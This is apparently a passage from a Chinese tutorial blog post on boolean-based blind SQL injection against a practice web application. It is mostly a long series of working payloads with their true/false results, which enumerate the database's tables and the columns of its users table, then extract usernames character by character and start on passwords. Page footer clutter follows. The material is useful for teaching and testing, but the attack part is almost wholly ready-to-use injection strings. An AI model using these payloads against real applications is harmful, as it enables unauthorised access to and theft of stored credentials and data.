# 二、正文

## step2 猜测数据库中表的数量

1' and (select count(table_name) from information_schema.tables where table_schema=database())=1#  不存在
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2#  存在

## step3 猜测每个表的名字

### 猜测第一个表名的长度

1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=1#  不存在

1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=2#  不存在

…………

1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=9#  存在

### 猜测第二个表名的长度

1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=1# 不存在

…………

1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=5# 存在

select * from table LIMIT 5,10; #返回第6-15行数据
select * from table LIMIT 5; #返回前5行
select * from table LIMIT 0,5; #返回前5行

limit a，b  #返回第a+1至a+b行的数据

### 猜测第一个表的表名

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97# 存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122# 存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>109# 不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103# 不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>106# 不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103#  存在

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>97#    存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))<122#    存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>109#    存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>115#    存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>118# 不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=116# 不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=117#    存在

### 猜测第二个表的表名

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,2),1,1))>97#
……………………

SBUSTR(str,pos);

SUBSTR(str,pos,len);

## step4 猜测users表中每列的名字

### 猜测users表的字段数

1' and (select count(column_name) from information_schema.columns where table_name='users')=1#        不成功
1' and (select count(column_name) from information_schema.columns where table_name='users')=14#        成功

### 猜测users表每一列的长度

1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1#
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7#成功

1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1))=1#
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1))=10#

1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 2,1),1))=1#
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 2,1),1))=9#

7,10,9,4,8,6,10,12,4,19,17,2,8,8

1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))>97# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))<122# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))>109# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))>115# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))>117# 不存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))=116# 不存在

1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),2,1))=115# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),3,1))=101# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),4,1))=114# 存在

1' and (select length(user) from users where user_id=1)=5#

1' and length(substr((select user from users where user_id=1),1))=5#

1' and ascii(substr((select user from users limit 0,1),1,1))=97#    a
1' and ascii(substr((select user from users limit 0,1),2,1))=100#    d
1' and ascii(substr((select user from users limit 0,1),3,1))=109#    m
1' and ascii(substr((select user from users limit 0,1),4,1))=105#    i
1' and ascii(substr((select user from users limit 0,1),5,1))=110#    n

1' and ascii(substr((select user from users limit 1,1),1,1))=103#    g
1' and ascii(substr((select user from users limit 1,1),2,1))=111#    o
1' and ascii(substr((select user from users limit 1,1),3,1))=114#    r
1' and ascii(substr((select user from users limit 1,1),4,1))=100#    d
1' and ascii(substr((select user from users limit 1,1),5,1))=111#    o
1' and ascii(substr((select user from users limit 1,1),6,1))=110#    n
1' and ascii(substr((select user from users limit 1,1),7,1))=98#    b

1' and ascii(substr((select password from users limit 0,1),1,1))>……

08-26 2841
12-05 367
07-27 636
08-27 6979
03-16 1万+
07-11 1405
12-02 599

### “相关推荐”对你有帮助么？

• 非常没帮助
• 没帮助
• 一般
• 有帮助
• 非常有帮助

Pz_mstr

¥2 ¥4 ¥6 ¥10 ¥20

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、C币套餐、付费专栏及课程。